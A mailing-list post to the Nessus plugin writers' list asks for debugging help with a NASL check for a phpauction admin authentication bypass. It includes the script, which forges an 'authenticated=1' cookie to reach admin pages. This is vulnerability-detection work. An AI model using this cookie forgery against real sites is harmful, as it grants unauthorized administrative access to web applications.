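.. I tried to write a nasl for a bug in phpauction I found early this year (http://www.securityfocus.com/bid/12069), but the nasl doesn't work completely. I sniffed the connection while executing the script and the script successfully uses the bypass possibility, moves to every given directory, but sadly the script doesn't recognize, that it successfully logged in. Maybe some of you guys would be so kind to have a look at it? Thanks in advance. Toby

# The script code starts here
include("http_func.inc");
include("http_keepalive.inc");

# Detection check for the phpauction admin authentication bypass
# (BID 12069): find an admin login page, resend the request with the
# bypass cookie and report the host if the admin page comes back.
port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);

# Candidate admin directories. Each entry must begin with "/" because it
# is concatenated directly with "/admin.php" below; the original list had
# "auktion/admin" without the leading slash, so that request line was
# malformed and the directory was never really tested.
dirs = make_list("/phpauction/admin", "/admin", "/auction/admin", "/auktion/admin", cgi_dirs());

foreach dir (dirs)
{
  req = http_get(item:dir + "/admin.php", port:port);
  res = http_keepalive_send_recv(port:port, data:req);
  if (res == NULL) exit(0);

  # Only a page showing the (German or English) password prompt is
  # treated as the login page.
  if ("Passwort " >< res || "Password" >< res)
  {
    # Insert the cookie header in front of the blank line that ends the
    # request headers.
    # NOTE(review): insstr() replaces the characters from idx to idx
    # inclusive, so the first CR of the terminating CRLFCRLF is consumed
    # and the Cookie line ends in a bare LF; most servers accept that,
    # but confirm with a capture if the header is not honoured.
    idx = stridx(req, string("\r\n\r\n"));
    req = insstr(req, '\r\nCookie: authenticated=1;', idx, idx);
    res = http_keepalive_send_recv(port:port, data:req);

    # NOTE(review): "Installation" is the post-login marker the author
    # reports as never matching even though the bypass itself works;
    # compare it against the admin page actually returned after the
    # bypass (the sniffed response) before relying on it.
    if ("Installation" >< res)
    {
      security_hole(port);
    }
    exit(0);
  }
}
# eof

_______________________________________________
Plugins-writers mailing list
Plugins-writers@private
http://mail.nessus.org/mailman/listinfo/plugins-writers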